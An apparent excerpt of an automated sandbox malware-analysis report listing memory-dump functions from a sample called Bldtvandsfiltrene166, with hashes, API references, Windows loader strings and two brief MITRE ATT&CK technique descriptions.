Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e921e7d74e6e108a3be09a184d257c35bdc8265d74a48c8a5bffa4f540cd551e
Instruction ID: 6ab78686510e3b987167bce7af0067602be6cc16b004940ad9383f5f90aebfb3
Opcode Fuzzy Hash: e921e7d74e6e108a3be09a184d257c35bdc8265d74a48c8a5bffa4f540cd551e
Instruction Fuzzy Hash: 4B900221211C0042D200756D4C94B07040557E0703F55C125A0155514CC926CA615622

Function 211B2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6abb0cc2c7c6af4d1ee8d8509e781badde68ec958f3316f9b09b1bc146af3d2b
Instruction ID: 74da4fd56e38f140b355bc01869330f9a20729a9676a05340353882abdd547de
Opcode Fuzzy Hash: 6abb0cc2c7c6af4d1ee8d8509e781badde68ec958f3316f9b09b1bc146af3d2b
Instruction Fuzzy Hash: 3390022130140402D102715D4494606040997E1745F95C022E1425515DC636CB53A233

Function 211B2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca64ec5e665d4e329c13fc9d10fae5b12891527e69417ce60f4e23f51bb74056
Instruction ID: 5351317d1cc928c7e2a00c0d52b181166bd3c72dae35d3f561d15d2a7c9d9ddf
Opcode Fuzzy Hash: ca64ec5e665d4e329c13fc9d10fae5b12891527e69417ce60f4e23f51bb74056
Instruction Fuzzy Hash: 9D90022160140502D101715D4484616040A57E0641F95C032A1025515ECA36CB92A232

Function 211B2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7232719577d3da9206af57728fe56fd5ece9b00620fd0ec8b820fe566b79ddcc
Instruction ID: f895bd893abe8b816b7498476dfffbf439c4f1ad693d5dd6c96e64319a26e4cc
Opcode Fuzzy Hash: 7232719577d3da9206af57728fe56fd5ece9b00620fd0ec8b820fe566b79ddcc
Instruction Fuzzy Hash: 3A90027120140402D140715D4484746040557E0701F55C021A5065514EC66ACFD56766

Function 211B2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d8501149d3d2ef6213b6318df4ef797ea0be99c0d7484a01d4b05e2215cd07
Instruction ID: 114561e60b7869aa39d29ceb924a11b85d4fdd316190909dfacb9888ed25139e
Opcode Fuzzy Hash: 87d8501149d3d2ef6213b6318df4ef797ea0be99c0d7484a01d4b05e2215cd07
Instruction Fuzzy Hash: 5390026120180403D140755D4884607040557E0702F55C021A2065515ECA3ACE516236

Function 211B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 1cf676a2acc7fe4f7ff4f26c56639b12818bafb32e6eff4fcd03c8a74d0474de
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 211B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 211B293C
___swprintf_l.LIBCMT ref: 211B295E
___swprintf_l.LIBCMT ref: 211B29A3
___swprintf_l.LIBCMT ref: 211EA52E

Strings

:%u.%u.%u.%u, xrefs: 211EA5B8
ffff:, xrefs: 211EA504
::%hs%u.%u.%u.%u, xrefs: 211EA527
::ffff:0:%u.%u.%u.%u, xrefs: 211EA54E

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 517d8d4498db47c560bb6c954db065eaa32cfa609d1dc9bf8d1314430436edc5
Instruction ID: 13df3555347e133c67fbe451847c222d511c2fa9f68088264470d5b9c9fdc5e3
Opcode Fuzzy Hash: 517d8d4498db47c560bb6c954db065eaa32cfa609d1dc9bf8d1314430436edc5
Instruction Fuzzy Hash: C45118B6A00526BFCB15DF98C89097EFBF8BF09240B118169E468D7241E334EF1487E1

Function 21222410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 212224A6
___swprintf_l.LIBCMT ref: 212224E2
___swprintf_l.LIBCMT ref: 2122257D
___swprintf_l.LIBCMT ref: 212225A3
___swprintf_l.LIBCMT ref: 212225C8
___swprintf_l.LIBCMT ref: 21222608

Strings

:%u.%u.%u.%u, xrefs: 212225FF
ffff:, xrefs: 2122247D, 2122249D
::%hs%u.%u.%u.%u, xrefs: 2122249E
::ffff:0:%u.%u.%u.%u, xrefs: 212224DA

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 3650c5fcc93f5be032180944003a295d201a01284a98dedd7c6a46a20c9a2ddd
Instruction ID: 866f6dd5dc05ae43d26be59b6fc8337a088bf477d1e654b262a779510674ca00
Opcode Fuzzy Hash: 3650c5fcc93f5be032180944003a295d201a01284a98dedd7c6a46a20c9a2ddd
Instruction Fuzzy Hash: F4511275A00A46AFCB25CE98CC9097FBBBCEB45200B40C459F59AD7642E676EB00C760

Function 2124A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 2124A6DD
RtlDebugPrintTimes.NTDLL ref: 2124A771
RtlDebugPrintTimes.NTDLL ref: 2124A794
RtlDebugPrintTimes.NTDLL ref: 2124A7C0
RtlDebugPrintTimes.NTDLL ref: 2124A895
RtlDebugPrintTimes.NTDLL ref: 2124A8E8
RtlDebugPrintTimes.NTDLL ref: 2124A907
RtlDebugPrintTimes.NTDLL ref: 2124A938

Strings

HEAP: , xrefs: 2124A686

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 5370627fe9afa811ab9b1457312264ebd0086d9f4afb1010e8b8b819bc00fb39
Instruction ID: 43bc7bb0eaa65f139098e142dd40531696fe10fa9112d4a732707408a54d4510
Opcode Fuzzy Hash: 5370627fe9afa811ab9b1457312264ebd0086d9f4afb1010e8b8b819bc00fb39
Instruction Fuzzy Hash: 3EA1AB75A142128FE709CF18C894A1ABBE9FF88310F15456DFA46DB361EB70ED02DB91

Function 2118A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

Actx , xrefs: 211D7A0C, 211D7A73
SsHd, xrefs: 2118A3E4
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 211D79D5
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 211D79FA
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 211D7AE6
RtlpFindActivationContextSection_CheckParameters, xrefs: 211D79D0, 211D79F5

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 19277d427acaa2d2243b6f39ec4a2da399c76a4dfdc0fb8407b0a396a226f1d6
Instruction ID: 3aa9573098bc72c7223fae70a6d9e055f66d98a417bd52d693278120f94d8637
Opcode Fuzzy Hash: 19277d427acaa2d2243b6f39ec4a2da399c76a4dfdc0fb8407b0a396a226f1d6
Instruction Fuzzy Hash: CAE1E2716043028FE711CF28D484B9A7BE5AF85358F168A2DE9618B2D1D731DB85CF92

Function 211665B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 21166664
RtlDebugPrintTimes.NTDLL ref: 211666AF

Strings

Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 211C9AF6
minkernel\ntdll\ldrinit.c, xrefs: 211C9AC5, 211C9B06
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 211C9AB4
LdrpLoadShimEngine, xrefs: 211C9ABB, 211C9AFC

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 4c33daa8d5c38c92823ee92cdc4dee172bb22b7b3e2e766abd81ff156a84b849
Instruction ID: 3e847b347242cd973984221cdfb224fc8944a94db126b85c83004f4fb3b9c1f1
Opcode Fuzzy Hash: 4c33daa8d5c38c92823ee92cdc4dee172bb22b7b3e2e766abd81ff156a84b849
Instruction Fuzzy Hash: 34511572A002999FDB08CFA8CC98FDD77BABB50708F014119F510AB299DB749E50CBD1

Function 21246940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: ea9064acaefb8e8e5c5697854ea98c349615ad70e3caca2540f3fa05f07d8736
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: D5020671908342AFD309CF18C890E6BBBE5EFD5704F00892DFA995B264DB31E945CB92

Function 21179126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 211D2559

Strings

@, xrefs: 21179175
$, xrefs: 21179191

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 8a926c4ed23dc709a0848aea401ddd765c955e54d59fd95419096b2909a9352b
Instruction ID: 3dca70731d965655ef05c6e3ae4a2e399d4c2c374447b2255746be95d1ef626b
Opcode Fuzzy Hash: 8a926c4ed23dc709a0848aea401ddd765c955e54d59fd95419096b2909a9352b
Instruction Fuzzy Hash: E3811B72D002699BDB25CF54CC44BDAB7B8AB49754F0141DAAA19B7280E7309F85CFA1

Function 211A4D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 211A4D64

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 211E362F
LdrpFindDllActivationContext, xrefs: 211E3636, 211E3662
minkernel\ntdll\ldrsnap.c, xrefs: 211E3640, 211E366C
Querying the active activation context failed with status 0x%08lx, xrefs: 211E365C

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: eac6c118b5ca830e54e7d85a5972e62760fdfd7df753750aafcc37f00d55becb
Instruction ID: 9899527b53bf0e5c428d45d264b5662d3fe0ad72501063575f8212fbd7dad556
Opcode Fuzzy Hash: eac6c118b5ca830e54e7d85a5972e62760fdfd7df753750aafcc37f00d55becb
Instruction Fuzzy Hash: E231503A900551AEEB12DB54C88AF9E7EE4AB23754F0B401DED0857E52D7B09F80C7D6

Function 212220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 2122214F
___swprintf_l.LIBCMT ref: 21222172

Strings

]:%u, xrefs: 21222169
[, xrefs: 2122212B
%%%u, xrefs: 21222146

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 5d2341754027e22277f30eaba72fa6542ee2a7482d6812eb44f47a36edba69b2
Instruction ID: a06829694f0f66548a190ed8eb59b2098f3c8bc3b8b14fef52a0c027320d3182
Opcode Fuzzy Hash: 5d2341754027e22277f30eaba72fa6542ee2a7482d6812eb44f47a36edba69b2
Instruction Fuzzy Hash: 3121517AA0051AABDB10DF69CC40EEE7BECAF55644F15012AFA05E3201E7329A118BA1

Function 21248927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 21248B03
RtlDebugPrintTimes.NTDLL ref: 21248B5B

Strings

File, xrefs: 212489EB
, xrefs: 21248A53

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $File
API String ID: 3446177414-2412145507
Opcode ID: 78a08c3e6b99d265021468e1b6e2b2fb6939764d48446d3e9b63027310714762
Instruction ID: 4078639271f8b463a164de39b5488e131de52f34cb9ff17b70b86fdefcbcc868
Opcode Fuzzy Hash: 78a08c3e6b99d265021468e1b6e2b2fb6939764d48446d3e9b63027310714762
Instruction Fuzzy Hash: 8661A271A6022D9FDB2A8F64CC41BED7BB9AB08704F0445E9F609E6191EA709F84CF50

Function 21222300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 2122238D
___swprintf_l.LIBCMT ref: 212223B3

Strings

]:%u, xrefs: 212223AA
%%%u, xrefs: 21222384

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 7043e3ae99dea4dbeff869d58ab9295a16af0b9a46f8de0ffe12c55ac5c63967
Instruction ID: 164b935495c0d9c09e6a7beb113693645ef5309cc5d1f3399b5ffc825236a49a
Opcode Fuzzy Hash: 7043e3ae99dea4dbeff869d58ab9295a16af0b9a46f8de0ffe12c55ac5c63967
Instruction Fuzzy Hash: C2316476A1051A9FDB50CF29CC40BEEB7FCEF55610F40455AF949E3240EB31AB549BA0

Function 2119EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0a73e73c298fd3cc6653036e9ee89f6f86e380ca5b980c00f4729942235a38
Instruction ID: 1471c4ff83f429fdbb696847423fb5bb98484ef0d1116cc26627e3c9a96ac463
Opcode Fuzzy Hash: cb0a73e73c298fd3cc6653036e9ee89f6f86e380ca5b980c00f4729942235a38
Instruction Fuzzy Hash: 92E130B1E00609EFCB25CFA9C980A8DBBF5FF49304F20456AE965A7261D730AA41CF51

Function 211EEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 211EEFE1
RtlDebugPrintTimes.NTDLL ref: 211EF009
RtlDebugPrintTimes.NTDLL ref: 211EF0AC
RtlDebugPrintTimes.NTDLL ref: 211EF160

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 802782d8bd8758bf8a53e7faad64c843ac8f6f8225945b7b341fadc1d7631982
Instruction ID: 231af954911d976cd2da9b72b5ed8f67c489fcd86720996c3d477826bea18779
Opcode Fuzzy Hash: 802782d8bd8758bf8a53e7faad64c843ac8f6f8225945b7b341fadc1d7631982
Instruction Fuzzy Hash: 05715771E0061A9FDF05CFE4C988ADDBBB5BF49314F14806AE909FB250D734AA05CBA1

Function 2124A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2124A577
RtlDebugPrintTimes.NTDLL ref: 2124A62A
RtlDebugPrintTimes.NTDLL ref: 2124A64E
RtlDebugPrintTimes.NTDLL ref: 2124A663

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1f07da2ad981ae0fdc72ca7396eb4cbd5ca9bc12252fcca127193ec11d0b587c
Instruction ID: 3947337735751a2952ef63b836d6a338193a36c47f70cbdc461314d88c0afa25
Opcode Fuzzy Hash: 1f07da2ad981ae0fdc72ca7396eb4cbd5ca9bc12252fcca127193ec11d0b587c
Instruction Fuzzy Hash: 03514871F106129FDB0CCF58DAA5A1977E5BB89210B10416DEA07DB750DB74ED41EBC0

Function 211A4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 211A4C96
0, xrefs: 211A4CC3

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 573a6d20d13a7fa345677cf14ae97c547f6a9602317e66aaaf1a19c33a38c3bb
Instruction ID: ad43ae79810bac0aad38a502e945f1a02db552d0259de2ab433e17ef953d3c5c
Opcode Fuzzy Hash: 573a6d20d13a7fa345677cf14ae97c547f6a9602317e66aaaf1a19c33a38c3bb
Instruction Fuzzy Hash: 4B51CCB5E006088FDB16CFA8C48969EFBF4EF55714F19806ED4099B651EB709B81CBC1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

